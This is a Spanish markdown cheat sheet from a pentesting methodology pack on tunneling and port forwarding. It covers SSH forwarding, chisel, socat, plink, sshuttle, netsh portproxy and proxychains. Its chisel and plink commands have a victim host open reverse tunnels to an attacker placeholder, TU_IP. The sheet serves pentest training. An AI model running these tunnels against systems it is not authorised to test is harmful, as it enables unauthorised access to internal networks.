JARVIS/nucleo/saber/conocimiento/08 - Avanzado/Tunneling.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

1.4 KiB

Tunneling y port forwarding

Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.

SSH (el más portable)

ssh -L 8080:127.0.0.1:80 user@pivot       # LOCAL: tu :8080 → servicio interno
ssh -R 3390:127.0.0.1:3389 user@kali      # REMOTE: expone el RDP del pivot en tu :3390
ssh -D 1080 user@pivot                     # DYNAMIC: proxy SOCKS en tu :1080
# luego: proxychains <herramienta>  (configura socks en /etc/proxychains4.conf)

Chisel (cuando no hay SSH)

# Kali (servidor):
./chisel server -p 8000 --reverse
# Víctima (cliente) → SOCKS reverso:
./chisel client TU_IP:8000 R:socks
# ahora: proxychains nmap -sT -Pn 192.168.5.10

socat (redirección simple)

socat TCP-LISTEN:8080,fork TCP:192.168.5.10:80
plink.exe -R 3390:127.0.0.1:3389 user@TU_IP

sshuttle (VPN improvisada, lo más cómodo)

sshuttle -r user@pivot 192.168.5.0/24 --dns

Windows nativo — netsh portproxy

netsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80

proxychains

  • proxychains nmap -sT -Pn IP → usa -sT (TCP connect): el SYN scan no pasa por el proxy. Ver Nmap NSE.

Relacionado: Pivoting ligolo-ng · Movimiento lateral · Puesto de mando Kali · OSCP MOC